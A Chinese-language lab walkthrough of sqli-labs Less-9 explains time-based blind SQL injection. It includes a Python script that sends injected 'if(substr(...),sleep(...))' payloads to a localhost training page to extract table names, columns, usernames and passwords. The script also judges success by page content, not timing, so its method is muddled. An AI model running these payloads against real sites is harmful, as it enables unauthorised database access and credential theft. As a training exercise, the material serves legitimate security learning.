sqlilabs less9

第九关提示是基于时间的盲注，首先先来了解一下必要的函数

sleep(time) 仅在MySQL 5之后可用。等待time那么多秒

benchmark(count,expr) 重复执行expr count次，用来测试MySql执行表达式的速度。

if(condition,when_ture,when_false) 如果满足condition，就 执行或打印when_ture，否则就执行或打印when_false
满足condition
不满足condition

先来判断注入类型



用了 1’、1"、1 没有反应，为什么没反应呢，我猜想可能是因为服务器无论正确与否只会发送You are in…这一个数据，所以需要一些方法来发现是否正确，所以就有时间盲注，通过观察等待时间判断正确与否。
猜测可能是这样

if  ((select * from tables where id = value) 有内容)
	print You are in.....
else
	print You are in.....

好了来实践一下
可以看到没有等待时间

等待了五秒，说明了什么，说明是字符型注入

先来判断列数

列数判断完以后就能开始下一步工作了
找到数据库名字长度是8

找数据库名字

找表名
属性名和元组值相同
不过手动时间盲注太过于麻烦，可以考虑burp suite，或者手写脚本。

import requests

def zr(url,zrname):
    array1 = "abcdefghijklmnopqrstuvwxyz_-.,"
    proof = "0000ff"
    tmp = zrname
    zrname = ''
    for i in range(1,100):
        url1 = url + str(i) + ',1)=\''
        for s in array1:
            url2 = url1 + s + '\',sleep(0.1),1)%23'
            r = requests.get(url2)
            if proof in r.text:
                zrname += s
    print( tmp + ": " + zrname)


zr('http://localhost/sqlilabs/Less-9/?id=1\' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),','tablename')
zr('http://localhost/sqlilabs/Less-9/?id=1\' and if(substr((select group_concat(column_name) from information_schema.columns where table_name = \'users\'),','columnslist')
zr('http://localhost/sqlilabs/Less-9/?id=1\' and if(substr((select group_concat(username) from users),','usernamelist')
zr('http://localhost/sqlilabs/Less-9/?id=1\' and if(substr((select group_concat(password) from users),','passwordlist')

啊，为什么判断条件是0000ff啊
我注意到正确的sql它有个这个

错误的就没有

总结一下
如果遇到有些情况，页面只有一种结果无法判断正确或者注入类型，就可以用时间盲注来通过等待时间判断正确。